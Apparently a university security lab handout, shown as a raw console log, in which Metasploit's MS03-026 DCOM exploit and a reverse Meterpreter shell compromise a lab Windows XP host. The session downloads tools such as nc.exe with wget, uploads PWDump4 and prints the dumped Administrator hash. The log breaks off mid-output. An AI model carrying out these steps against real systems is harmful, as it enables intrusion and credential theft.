ࡱ> y YbjbjEE 4''Y  X42X4X4X4X4X4X4X$Y\VXXXXmXfLfLfLR2XfL2XfLfLfL5 -fLXX0XfL\L^\fL\fL fLXXXXfLX\ : Exploit XPUP using Msfconsole of framework 2 with meterpreter Here we run msfconsole on viva and testing an xpup machine. First login viva and edit your .bash_profile to include the path to framework-2.7. You can also use framework-3.0 if you are familiar with it. They have different ways to organize the exploits and payload. Framework-3.0 is more organized. Here is the line of PATH in .bash_profile I modified. PATH=$PATH:$HOME/bin:/opt/framework-2.7 [cs591@viva ~]$ msfconsole Using Term::ReadLine::Stub, I suggest installing something better (ie Term::ReadLine::Gnu) ____________ < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * + -- --=[ msfconsole v2.7 [158 exploits - 76 payloads] msf > show exploits Metasploit Framework Loaded Exploits ==================================== 3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow Credits Metasploit Framework Credits afp_loginext AppleFileServer LoginExt PathName Overflow aim_goaway AOL Instant Messenger goaway Overflow altn_webadmin Alt-N WebAdmin USER Buffer Overflow apache_chunked_win32 Apache Win32 Chunked Encoding arkeia_agent_access Arkeia Backup Client Remote Access arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X) arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32) awstats_configdir_exec AWStats configdir Remote Command Execution backupexec_agent Veritas Backup Exec Windows Remote Agent Overflow backupexec_dump Veritas Backup Exec Windows Remote File Access backupexec_ns Veritas Backup Exec Name Service Overflow backupexec_registry Veritas Backup Exec Server Registry Access badblue_ext_overflow BadBlue 2.5 EXT.dll Buffer Overflow bakbone_netvault_heap BakBone NetVault Remote Heap Overflow barracuda_img_exec Barracuda IMG.PL Remote Command Execution blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow bluecoat_winproxy Blue Coat Systems WinProxy Host Header Buffer Overflow bomberclone_overflow_win32 Bomberclone 0.11.6 Buffer Overflow cabrightstor_disco CA BrightStor Discovery Service Overflow cabrightstor_disco_servicepc CA BrightStor Discovery Service SERVICEPC Overflow cabrightstor_sqlagent CA BrightStor Agent for Microsoft SQL Overflow cabrightstor_uniagent CA BrightStor Universal Agent Overflow cacam_logsecurity_win32 CA CAM log_security() Stack Overflow (Win32) cacti_graphimage_exec Cacti graph_image.php Remote Command Execution calicclnt_getconfig CA License Client GETCONFIG Overflow calicserv_getconfig CA License Server GETCONFIG Overflow cesarftp_mkd Cesar FTP 0.99g MKD Command Buffer Overflow distcc_exec DistCC Daemon Command Execution edirectory_imonitor eDirectory 8.7.3 iMonitor Remote Stack Overflow edirectory_imonitor2 eDirectory 8.8 iMonitor Remote Stack Overflow eiq_license EIQ License Manager Overflow eudora_imap Qualcomm WorldMail IMAPD Server Buffer Overflow exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow firefox_queryinterface_linux Firefox location.QueryInterface() Code Execution (Linux x86) firefox_queryinterface_osx Firefox location.QueryInterface() Code Execution (Mac OS X) freeftpd_key_exchange FreeFTPd 1.0.10 Key Exchange Algorithm Buffer Overflow freeftpd_user freeFTPd USER Overflow freesshd_key_exchange FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow futuresoft_tftpd FutureSoft TFTP Server 2000 Buffer Overflow globalscapeftp_user_input GlobalSCAPE Secure FTP Server user input overflow gnu_mailutils_imap4d GNU Mailutils imap4d Format String Vulnerability google_proxystylesheet_exec Google Appliance ProxyStyleSheet Command Execution hpux_ftpd_preauth_list HP-UX FTP Server Preauthentication Directory Listing hpux_lpd_exec HP-UX LPD Command Execution ia_webmail IA WebMail 3.x Buffer Overflow icecast_header Icecast (<= 2.0.1) Header Overwrite (win32) ie_createobject Internet Explorer COM CreateObject Code Execution ie_createtextrange Internet Explorer createTextRange() Code Execution ie_iscomponentinstalled Windows XP SP0 IE 6.0 IsComponentInstalled() Overflow ie_objecttype Internet Explorer Object Type Overflow ie_vml_rectfill Internet Explorer VML Fill Method Code Execution ie_webview_setslice Internet Explorer WebViewFolderIcon setSlice() Code Execution ie_xp_pfv_metafile Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution iis40_htr IIS 4.0 .HTR Buffer Overflow iis50_printer_overflow IIS 5.0 Printer Buffer Overflow iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow iis_fp30reg_chunked IIS FrontPage fp30reg.dll Chunked Overflow iis_nsiislog_post IIS nsiislog.dll ISAPI POST Overflow iis_source_dumper IIS Web Application Source Code Disclosure iis_w3who_overflow IIS w3who.dll ISAPI Overflow imail_imap_delete IMail IMAP4D Delete Overflow imail_ldap IMail LDAP Service Buffer Overflow irix_lpsched_exec IRIX lpsched Command Execution kerio_auth Kerio Personal Firewall 2 (2.1.4) Remote Auth Packet Overflow lsass_ms04_011 Microsoft LSASS MSO4-011 Overflow lyris_attachment_mssql Lyris ListManager Attachment SQL Injection (MSSQL) mailenable_auth_header MailEnable Authorization Header Buffer Overflow mailenable_imap MailEnable Pro (1.54) IMAP STATUS Request Buffer Overflow mailenable_imap_w3c MailEnable IMAPD W3C Logging Buffer Overflow maxdb_webdbm_get_overflow MaxDB WebDBM GET Buffer Overflow mcafee_epolicy_source McAfee ePolicy Orchestrator / ProtPilot Source Overflow mdaemon_imap_cram_md5 Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow mercantec_softcart Mercantec SoftCart CGI Overflow mercur_imap_select_overflow Mercur v5.0 IMAP SP3 SELECT Buffer Overflow mercury_imap Mercury/32 v4.01a IMAP RENAME Buffer Overflow minishare_get_overflow Minishare 1.4.1 Buffer Overflow mozilla_compareto Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution ms05_030_nntp Microsoft Outlook Express NNTP Response Overflow ms05_039_pnp Microsoft PnP MS05-039 Overflow msasn1_ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow msmq_deleteobject_ms05_017 Microsoft Message Queueing Service MSO5-017 msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3-026 mssql2000_preauthentication MSSQL 2000/MSDE Hello Buffer Overflow mssql2000_resolution MSSQL 2000/MSDE Resolution Overflow netapi_ms06_040 Microsoft CanonicalizePathName() MSO6-040 Overflow netterm_netftpd_user_overflow NetTerm NetFTPD USER Buffer Overflow niprint_lpd NIPrint LPD Request Overflow novell_messenger_acceptlang Novell Messenger Server 2.0 Accept-Language Overflow openview_connectednodes_exec HP Openview connectedNodes.ovpl Remote Command Execution openview_omniback HP OpenView Omniback II Command Execution oracle9i_xdb_ftp Oracle 9i XDB FTP UNLOCK Overflow (win32) oracle9i_xdb_ftp_pass Oracle 9i XDB FTP PASS Overflow (win32) oracle9i_xdb_http Oracle 9i XDB HTTP PASS Overflow (win32) pajax_remote_exec PAJAX Remote Command Execution payload_handler Metasploit Framework Payload Handler peercast_url_linux PeerCast <= 0.1216 URL Handling Buffer Overflow (Linux) peercast_url_win32 PeerCast <= 0.1216 URL Handling Buffer Overflow(win32) php_vbulletin_template vBulletin misc.php Template Name Arbitrary Code Execution php_wordpress_lastpost WordPress cache_lastpostdate Arbitrary Code Execution php_xmlrpc_eval PHP XML-RPC Arbitrary Code Execution phpbb_highlight phpBB viewtopic.php Arbitrary Code Execution phpnuke_search_module PHPNuke Search Module SQL Injection Vulnerability poptop_negative_read Poptop Negative Read Overflow privatewire_gateway_win32 Private Wire Gateway Buffer Overflow (win32) putty_ssh PuTTy.exe <= v0.53 Buffer Overflow realserver_describe_linux RealServer Describe Buffer Overflow realvnc_41_bypass RealVNC 4.1 Authentication Bypass realvnc_client RealVNC 3.3.7 Client Buffer Overflow rras_ms06_025 Microsoft RRAS MSO6-025 Stack Overflow rras_ms06_025_rasman Microsoft RRAS MSO6-025 RASMAN Registry Stack Overflow rsa_iiswebagent_redirect IIS RSA WebAgent Redirect Overflow safari_safefiles_exec Safari Archive Metadata Command Execution samba_nttrans Samba Fragment Reassembly Overflow samba_trans2open Samba trans2open Overflow samba_trans2open_osx Samba trans2open Overflow (Mac OS X) samba_trans2open_solsparc Samba trans2open Overflow (Solaris SPARC) sambar6_search_results Sambar 6 Search Results Buffer Overflow seattlelab_mail_55 Seattle Lab Mail 5.5 POP3 Buffer Overflow securecrt_ssh1 SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow sentinel_lm7_overflow SentinelLM UDP Buffer Overflow servu_mdtm_overflow Serv-U FTPD MDTM Overflow shixxnote_font ShixxNOTE 6.net Font Buffer Overflow shoutcast_format_win32 SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow slimftpd_list_concat SlimFTPd LIST Concatenation Overflow smb_sniffer SMB Password Capture Service solaris_dtspcd_noir Solaris dtspcd Heap Overflow solaris_kcms_readfile Solaris KCMS Arbitary File Read solaris_lpd_exec Solaris LPD Command Execution solaris_lpd_unlink Solaris LPD Arbitrary File Delete solaris_sadmind_exec Solaris sadmind Command Execution solaris_snmpxdmid Solaris snmpXdmid AddComponent Overflow solaris_ttyprompt Solaris in.telnetd TTYPROMPT Buffer Overflow sphpblog_file_upload Simple PHP Blog remote command execution squid_ntlm_authenticate Squid NTLM Authenticate Overflow svnserve_date Subversion Date Svnserve sybase_easerver Sybase EAServer 5.2 Remote Stack Overflow sygate_policy_manager Sygate Management Server SQL Injection tftpd32_long_filename TFTPD32 <= 2.21 Long Filename Buffer Overflow trackercam_phparg_overflow TrackerCam PHP Argument Buffer Overflow ultravnc_client UltraVNC 1.0.1 Client Buffer Overflow uow_imap4_copy University of Washington IMAP4 COPY Overflow uow_imap4_lsub University of Washington IMAP4 LSUB Overflow ut2004_secure_linux Unreal Tournament 2004 "secure" Overflow (Linux) ut2004_secure_win32 Unreal Tournament 2004 "secure" Overflow (Win32) warftpd_165_pass War-FTPD 1.65 PASS Overflow warftpd_165_user War-FTPD 1.65 USER Overflow webmin_file_disclosure Webmin file disclosure webstar_ftp_user WebSTAR FTP Server USER Overflow winamp_playlist_unc Winamp Playlist UNC Path Computer Name Overflow windows_ssl_pct Microsoft SSL PCT MS04-011 Overflow wins_ms04_045 Microsoft WINS MS04-045 Code Execution wmailserver_smtp SoftiaCom WMailserver 1.0 SMTP Buffer Overflow wsftp_server_503_mkd WS-FTP Server 5.03 MKD Overflow wzdftpd_site Wzdftpd SITE Command Arbitrary Command Execution ypops_smtp YahooPOPS! <= 0.6 SMTP Buffer Overflow zenworks_desktop_agent ZENworks 6.5 Desktop/Server Management Remote Stack Overflow msf > set msrpc_dcom_ms03_026 msfconsole: set: command not found msf > use msrpc_dcom_ms03_026 msf msrpc_dcom_ms03_026 > set RHOST 128.198.60.156 RHOST -> 128.198.60.156 msf msrpc_dcom_ms03_026 > set RPORT 135 RPORT -> 135 msf msrpc_dcom_ms03_026 > set LHOST 128.198.60.192 LHOST -> 128.198.60.192 msf msrpc_dcom_ms03_026 > set LPORT 4321 LPORT -> 4321 msf msrpc_dcom_ms03_026 > show payloads Metasploit Framework Usable Payloads ==================================== win32_adduser Windows Execute net user /ADD win32_bind Windows Bind Shell win32_bind_dllinject Windows Bind DLL Inject win32_bind_meterpreter Windows Bind Meterpreter DLL Inject win32_bind_stg Windows Staged Bind Shell win32_bind_stg_upexec Windows Staged Bind Upload/Execute win32_bind_vncinject Windows Bind VNC Server DLL Inject win32_downloadexec Windows Executable Download and Execute win32_exec Windows Execute Command win32_passivex Windows PassiveX ActiveX Injection Payload win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload win32_passivex_stg Windows Staged PassiveX Shell win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload win32_reverse Windows Reverse Shell win32_reverse_dllinject Windows Reverse DLL Inject win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject win32_reverse_ord Windows Staged Reverse Ordinal Shell win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject win32_reverse_stg Windows Staged Reverse Shell win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute win32_reverse_vncinject Windows Reverse VNC Server Inject msf msrpc_dcom_ms03_026 > set win32_reverse_meterpreter win32_reverse_meterpreter: msf msrpc_dcom_ms03_026 > set TARGET 2 TARGET -> 2 msf msrpc_dcom_ms03_026 > exploit [*] This exploit requires a valid payload to be specified first. msf msrpc_dcom_ms03_026 > set payload win32_reverse_meterpreter payload -> win32_reverse_meterpreter [*] WARNING: the correct case of the 'payload' variable is 'PAYLOAD' msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit [*] Invalid target specified. msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set PAYLOAD win32_reverse_meterpreter PAYLOAD -> win32_reverse_meterpreter msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit [*] Invalid target specified. msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set TARGET 0 TARGET -> 0 msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit [*] Starting Reverse Handler. [*] Sending request... [*] Got connection from 128.198.60.192:4321 <-> 128.198.60.156:1027 [*] Sending Intermediate Stager (89 bytes) [*] Sending Stage (2834 bytes) [*] Sleeping before sending dll. [*] Uploading dll to memory (69643), Please wait... [*] Upload completed meterpreter> [ -= connected to =- ] [ -= meterpreter server =- ] [ -= v. 00000500 =- ] meterpreter> ls invalid command meterpreter> help Core Core feature set commands ------------ ---------------- read Reads from a communication channel write Writes to a communication channel close Closes a communication channel interact Switch to interactive mode with a channel help Displays the list of all register commands exit Exits the client initcrypt Initializes the cryptographic subsystem Extensions Feature extension commands ------------ ---------------- loadlib Loads a library on the remote endpoint use Uses a feature extension module meterpreter> use -m Process loadlib: Loading library from 'ext472627.dll' on the remote machine. meterpreter> loadlib: success. meterpreter> help Core Core feature set commands ------------ ---------------- read Reads from a communication channel write Writes to a communication channel close Closes a communication channel interact Switch to interactive mode with a channel help Displays the list of all register commands exit Exits the client initcrypt Initializes the cryptographic subsystem Extensions Feature extension commands ------------ ---------------- loadlib Loads a library on the remote endpoint use Uses a feature extension module Process Process manipulation and execution commands ------------ ---------------- execute Executes a process on the remote endpoint kill Terminate one or more processes on the remote endpoint ps List processes on the remote endpoint meterpreter> use -m Fs loadlib: Loading library from 'ext500104.dll' on the remote machine. meterpreter> loadlib: success. meterpreter> help Core Core feature set commands ------------ ---------------- read Reads from a communication channel write Writes to a communication channel close Closes a communication channel interact Switch to interactive mode with a channel help Displays the list of all register commands exit Exits the client initcrypt Initializes the cryptographic subsystem Extensions Feature extension commands ------------ ---------------- loadlib Loads a library on the remote endpoint use Uses a feature extension module Process Process manipulation and execution commands ------------ ---------------- execute Executes a process on the remote endpoint kill Terminate one or more processes on the remote endpoint ps List processes on the remote endpoint File System File system interaction and manipulation commands ------------ ---------------- cd Change working directory. getcwd Get the current working directory. ls List the contents of a directory. upload Upload one or more files to a remote directory. download Download one or more files from a remote directory. meterpreter> upload wget.exe Usage: upload src1 [src2 ...] dst meterpreter> upload wget.exe c:\ upload: Starting upload of 'wget.exe' to 'c:\\wget.exe'... upload: 1 uploads started. meterpreter> upload: Upload from 'wget.exe' succeeded. meterpreter> upload plink.exe Usage: upload src1 [src2 ...] dst meterpreter> upload plink.exe c:\ upload: Starting upload of 'plink.exe' to 'c:\\plink.exe'... upload: 1 uploads started. meterpreter> upload: Upload from 'plink.exe' succeeded. meterpreter> execute -f wget.exe -a http://viva.uccs.edu/~cs591/wintool/tftpd32.exe execute: Executing 'wget.exe'... meterpreter> execute: failure, 2. meterpreter> help Core Core feature set commands ------------ ---------------- read Reads from a communication channel write Writes to a communication channel close Closes a communication channel interact Switch to interactive mode with a channel help Displays the list of all register commands exit Exits the client initcrypt Initializes the cryptographic subsystem Extensions Feature extension commands ------------ ---------------- loadlib Loads a library on the remote endpoint use Uses a feature extension module Process Process manipulation and execution commands ------------ ---------------- execute Executes a process on the remote endpoint kill Terminate one or more processes on the remote endpoint ps List processes on the remote endpoint File System File system interaction and manipulation commands ------------ ---------------- cd Change working directory. getcwd Get the current working directory. ls List the contents of a directory. upload Upload one or more files to a remote directory. download Download one or more files from a remote directory. meterpreter> execute -f c:\wget.exe -a http://viva.uccs.edu/~cs591/wintool/nc.exe execute: Executing 'c:\wget.exe'... meterpreter> execute: success, process id is 188. meterpreter> execute -f c:\wget.exe -a http://viva.uccs.edu/~cs591/wintool/tftpd32.exe execute: Executing 'c:\wget.exe'... meterpreter> execute: success, process id is 224. meterpreter> execute -f c:\tftpd32.exe execute: Executing 'c:\tftpd32.exe'... meterpreter> execute: failure, 2. meterpreter> execute -f cmd -c execute: Executing 'cmd'... meterpreter> execute: success, process id is 2020. execute: allocated channel 3 for new process. meterpreter> interact 3 interact: Switching to interactive console on 3... meterpreter> interact: Started interactive channel 3. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>cd .. cd .. C:\WINDOWS>cd .. cd .. C:\>ls ls 'ls' is not recognized as an internal or external command, operable program or batch file. C:\>dir dir Volume in drive C has no label. Volume Serial Number is ECC2-88FC Directory of C:\ 07/27/2004 09:21 PM 0 AUTOEXEC.BAT 07/27/2004 09:21 PM 0 CONFIG.SYS 07/27/2004 09:54 PM cs301 01/07/2007 12:23 AM Documents and Settings 03/05/2007 10:59 PM 229,376 plink.exe 01/07/2007 12:20 AM Program Files 03/05/2007 10:58 PM 308,736 wget.exe 01/06/2007 11:27 PM WINDOWS 4 File(s) 538,112 bytes 4 Dir(s) 15,457,402,880 bytes free C:\>plink.exe -ssh cs591@viva.uccs.edu plink.exe -ssh cs591@viva.uccs.edu The server's host key is not cached in the registry. You have no guarantee that the server is the computer you think it is. The server's key fingerprint is: ssh-rsa 2048 a8:e4:d7:d4:e7:61:dd:02:26:e6:c1:b5:f9:12:2b:83 If you trust this host, enter "y" to add the key to PuTTY's cache and carry on connecting. If you want to carry on connecting just once, without adding the key to the cache, enter "n". If you do not trust this host, press Return to abandon the connection. Store key in cache? (y/n) y cs591@viva.uccs.edu's password: XXXXXX cs591@viva.uccs.edu's password: XXXXXX cs591@viva.uccs.edu's password: Caught interrupt, close interactive session? [y/N] y meterpreter> execute -f cmd -c execute: Executing 'cmd'... meterpreter> execute: success, process id is 356. execute: allocated channel 4 for new process. meterpreter> interact 4 interact: Switching to interactive console on 4... meterpreter> interact: Started interactive channel 4. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>cd .. cd .. C:\WINDOWS>cd .. cd .. C:\>ls ls 'ls' is not recognized as an internal or external command, operable program or batch file. C:\>dir dir Volume in drive C has no label. Volume Serial Number is ECC2-88FC Directory of C:\ 07/27/2004 09:21 PM 0 AUTOEXEC.BAT 07/27/2004 09:21 PM 0 CONFIG.SYS 07/27/2004 09:54 PM cs301 01/07/2007 12:23 AM Documents and Settings 03/05/2007 10:59 PM 229,376 plink.exe 01/07/2007 12:20 AM Program Files 03/05/2007 10:58 PM 308,736 wget.exe 03/05/2007 11:09 PM WINDOWS 4 File(s) 538,112 bytes 4 Dir(s) 15,457,370,112 bytes free C:\>plink -l cs591 -pw XXXXXX viva.uccs.edu plink -l cs591 -pw XXXXX viva.uccs.edu Last login: Wed May 9 00:15:10 2007 from c-75-70-32-124.hsd1.co.comcast.net [cs591@viva ~]$ ls ls bin CS591S2007Grade.txt out vmware bufferOverflow Desktop public_html cs591ClientFromViva.p12 framework-2.7-snapshot.tar.gz secure [cs591@viva ~]$ exit exit logout Using username "cs591". C:\>plink -ssh cs591@viva.ucs.edu scp plink -ssh cs591@viva.ucs.edu scp Unable to open connection: Host does not exist C:\> meterpreter> upload ../passwd-attack/PWDump4.exe c:\ upload: Starting upload of '../passwd-attack/PWDump4.exe' to 'c:\\PWDump4.exe'... upload: 1 uploads started. meterpreter> upload: Upload from '../passwd-attack/PWDump4.exe' succeeded. meterpreter> upload ../passwd-attack/PWDupm4.dll c:\ upload: Starting upload of '../passwd-attack/PWDupm4.dll' to 'c:\\PWDupm4.dll'... upload: 1 uploads started. meterpreter> Error: Local file '../passwd-attack/PWDupm4.dll' could not be opened for reading. meterpreter> upload ../passwd-attack/PWDump4.dll c:\ upload: Starting upload of '../passwd-attack/PWDump4.dll' to 'c:\\PWDump4.dll'... upload: 1 uploads started. meterpreter> upload: Upload from '../passwd-attack/PWDump4.dll' succeeded. meterpreter> help Core Core feature set commands ------------ ---------------- read Reads from a communication channel write Writes to a communication channel close Closes a communication channel interact Switch to interactive mode with a channel help Displays the list of all register commands exit Exits the client initcrypt Initializes the cryptographic subsystem Extensions Feature extension commands ------------ ---------------- loadlib Loads a library on the remote endpoint use Uses a feature extension module Process Process manipulation and execution commands ------------ ---------------- execute Executes a process on the remote endpoint kill Terminate one or more processes on the remote endpoint ps List processes on the remote endpoint File System File system interaction and manipulation commands ------------ ---------------- cd Change working directory. getcwd Get the current working directory. ls List the contents of a directory. upload Upload one or more files to a remote directory. download Download one or more files from a remote directory. meterpreter> upload ../passwd-attack/PWDump4.exe c:\ upload: Starting upload of '../passwd-attack/PWDump4.exe' to 'c:\\PWDump4.exe'... upload: 1 uploads started. meterpreter> upload: Upload from '../passwd-attack/PWDump4.exe' succeeded. meterpreter> upload ../passwd-attack/PWDupm4.dll c:\ upload: Starting upload of '../passwd-attack/PWDupm4.dll' to 'c:\\PWDupm4.dll'... upload: 1 uploads started. meterpreter> Error: Local file '../passwd-attack/PWDupm4.dll' could not be opened for reading. meterpreter> upload ../passwd-attack/PWDump4.dll c:\ upload: Starting upload of '../passwd-attack/PWDump4.dll' to 'c:\\PWDump4.dll'... upload: 1 uploads started. meterpreter> upload: Upload from '../passwd-attack/PWDump4.dll' succeeded. meterpreter> execute -f cmd -c execute: Executing 'cmd'... meterpreter> meterpreter> execute -f cmd -c execute: Executing 'cmd'... meterpreter> meterpreter> meterpreter> show invalid command meterpreter> help Core Core feature set commands ------------ ---------------- read Reads from a communication channel write Writes to a communication channel close Closes a communication channel interact Switch to interactive mode with a channel help Displays the list of all register commands exit Exits the client initcrypt Initializes the cryptographic subsystem Extensions Feature extension commands ------------ ---------------- loadlib Loads a library on the remote endpoint use Uses a feature extension module Process Process manipulation and execution commands ------------ ---------------- execute Executes a process on the remote endpoint kill Terminate one or more processes on the remote endpoint ps List processes on the remote endpoint File System File system interaction and manipulation commands ------------ ---------------- cd Change working directory. getcwd Get the current working directory. ls List the contents of a directory. upload Upload one or more files to a remote directory. download Download one or more files from a remote directory. meterpreter> execute -f cmd -c execute: Executing 'cmd'... meterpreter> meterpreter> exit exit The meterpreter is shutting down... [*] Meterpreter client finished. [*] Exiting Reverse Handler. msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit [*] Starting Reverse Handler. [*] Sending request... [*] Exiting Reverse Handler. msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit [*] Starting Reverse Handler. [*] Sending request... [*] Exiting Reverse Handler. msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit [*] Starting Reverse Handler. [*] Sending request... [*] Exiting Reverse Handler. msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > quit [cs591@viva tools]$ msfconsole Using Term::ReadLine::Stub, I suggest installing something better (ie Term::ReadLine::Gnu) _ _ _ _ | | | | (_) | _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __| | | | | | | __/ || (_| \__ \ |_) | | (_) | | |_ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__| | | |_| + -- --=[ msfconsole v2.7 [158 exploits - 76 payloads] msf > set msrpc_dcom_ms03_026 msfconsole: set: command not found msf > use msrpc_dcom_ms03_026 msf msrpc_dcom_ms03_026 > set RHOST 128.198.60.156 RHOST -> 128.198.60.156 msf msrpc_dcom_ms03_026 > set RPORT 135 RPORT -> 135 msf msrpc_dcom_ms03_026 > set LHOST 128.198.60.192 LHOST -> 128.198.60.192 msf msrpc_dcom_ms03_026 > set LPORT 4321 LPORT -> 4321 msf msrpc_dcom_ms03_026 > set win32_reverse_meterpreter win32_reverse_meterpreter: msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse_meterpreter PAYLOAD -> win32_reverse_meterpreter msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set TARGET 0 TARGET -> 0 msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit [*] Starting Reverse Handler. [*] Sending request... [*] Got connection from 128.198.60.192:4321 <-> 128.198.60.156:1027 [*] Sending Intermediate Stager (89 bytes) [*] Sending Stage (2834 bytes) [*] Sleeping before sending dll. [*] Uploading dll to memory (69643), Please wait... [*] Upload completed meterpreter> [ -= connected to =- ] [ -= meterpreter server =- ] [ -= v. 00000500 =- ] meterpreter> help Core Core feature set commands ------------ ---------------- read Reads from a communication channel write Writes to a communication channel close Closes a communication channel interact Switch to interactive mode with a channel help Displays the list of all register commands exit Exits the client initcrypt Initializes the cryptographic subsystem Extensions Feature extension commands ------------ ---------------- loadlib Loads a library on the remote endpoint use Uses a feature extension module meterpreter> use -m Process loadlib: Loading library from 'ext285386.dll' on the remote machine. meterpreter> loadlib: success. meterpreter> use -m Fs loadlib: Loading library from 'ext821455.dll' on the remote machine. meterpreter> loadlib: success. meterpreter> help Core Core feature set commands ------------ ---------------- read Reads from a communication channel write Writes to a communication channel close Closes a communication channel interact Switch to interactive mode with a channel help Displays the list of all register commands exit Exits the client initcrypt Initializes the cryptographic subsystem Extensions Feature extension commands ------------ ---------------- loadlib Loads a library on the remote endpoint use Uses a feature extension module Process Process manipulation and execution commands ------------ ---------------- execute Executes a process on the remote endpoint kill Terminate one or more processes on the remote endpoint ps List processes on the remote endpoint File System File system interaction and manipulation commands ------------ ---------------- cd Change working directory. getcwd Get the current working directory. ls List the contents of a directory. upload Upload one or more files to a remote directory. download Download one or more files from a remote directory. meterpreter> execute -f cmd -c execute: Executing 'cmd'... meterpreter> execute: success, process id is 320. execute: allocated channel 1 for new process. meterpreter> interact 1 interact: Switching to interactive console on 1... meterpreter> interact: Started interactive channel 1. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>cd .. cd .. C:\WINDOWS>cd .. cd .. C:\>ls ls 'ls' is not recognized as an internal or external command, operable program or batch file. C:\>dir dir Volume in drive C has no label. Volume Serial Number is ECC2-88FC Directory of C:\ 07/27/2004 09:21 PM 0 AUTOEXEC.BAT 07/27/2004 09:21 PM 0 CONFIG.SYS 07/27/2004 09:54 PM cs301 01/07/2007 12:23 AM Documents and Settings 03/05/2007 10:59 PM 229,376 plink.exe 01/07/2007 12:20 AM Program Files 03/05/2007 11:20 PM 4,608 PWDump4.dll 03/05/2007 11:19 PM 16,384 PWDump4.exe 03/05/2007 11:20 PM 0 PWDupm4.dll 03/05/2007 10:58 PM 308,736 wget.exe 03/05/2007 11:09 PM WINDOWS 7 File(s) 559,104 bytes 4 Dir(s) 15,457,337,344 bytes free C:\>delete PWDupm4.dll delete PWDupm4.dll 'delete' is not recognized as an internal or external command, operable program or batch file. C:\>del PWDupm4.dll del PWDupm4.dll C:\>dir dir Volume in drive C has no label. Volume Serial Number is ECC2-88FC Directory of C:\ 07/27/2004 09:21 PM 0 AUTOEXEC.BAT 07/27/2004 09:21 PM 0 CONFIG.SYS 07/27/2004 09:54 PM cs301 01/07/2007 12:23 AM Documents and Settings 03/05/2007 10:59 PM 229,376 plink.exe 01/07/2007 12:20 AM Program Files 03/05/2007 11:20 PM 4,608 PWDump4.dll 03/05/2007 11:19 PM 16,384 PWDump4.exe 03/05/2007 10:58 PM 308,736 wget.exe 03/05/2007 11:09 PM WINDOWS 6 File(s) 559,104 bytes 4 Dir(s) 15,457,337,344 bytes free C:\>PWDump4 PWDump4 PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack. by bingle@email.com.cn This program is free software based on pwpump3 by Phil Staubs under the GNU General Public License Version 2. Usage: PWDUMP4 [Target | /l] [/s:share] [/o:outputFile] [/u:userName] [Target] -- Target Computer's ip or name to work, [/l] -- works on local Computer. [/s:share] -- Share used to copy files instead of Admin$. [/o:outputFile] -- Result filename for output. [/u:userName] -- UserName used to connect, provide password later. [/r[:newname]] -- Rename the files to 'newname' when copy to the target, rename service name also, see FAQ for more. C:\>PWDump4 /l /o:passwd.txt PWDump4 /l /o:passwd.txt PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack. by bingle@email.com.cn This program is free software based on pwpump3 by Phil Staubs under the GNU General Public License Version 2. SRV>Version: OS Ver 5.1, , Workstation C:\>dir dir Volume in drive C has no label. Volume Serial Number is ECC2-88FC Directory of C:\ 07/27/2004 09:21 PM 0 AUTOEXEC.BAT 07/27/2004 09:21 PM 0 CONFIG.SYS 07/27/2004 09:54 PM cs301 01/07/2007 12:23 AM Documents and Settings 03/05/2007 11:34 PM 88 passwd.txt 03/05/2007 10:59 PM 229,376 plink.exe 01/07/2007 12:20 AM Program Files 03/05/2007 11:20 PM 4,608 PWDump4.dll 03/05/2007 11:19 PM 16,384 PWDump4.exe 03/05/2007 10:58 PM 308,736 wget.exe 03/05/2007 11:09 PM WINDOWS 7 File(s) 559,192 bytes 4 Dir(s) 15,457,329,152 bytes free C:\>vi passwd.txt vi passwd.txt 'vi' is not recognized as an internal or external command, operable program or batch file. C:\>cat passwd.txt cat passwd.txt 'cat' is not recognized as an internal or external command, operable program or batch file. C:\>more passwd.txt more passwd.txt Administrator:500:626309417146BFFDAAD3B435B51404EE:C136578936200A5DDAB03847745758F7::: C:\>PWDump4 PWDump4 PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack. by bingle@email.com.cn This program is free software based on pwpump3 by Phil Staubs under the GNU General Public License Version 2. Usage: PWDUMP4 [Target | /l] [/s:share] 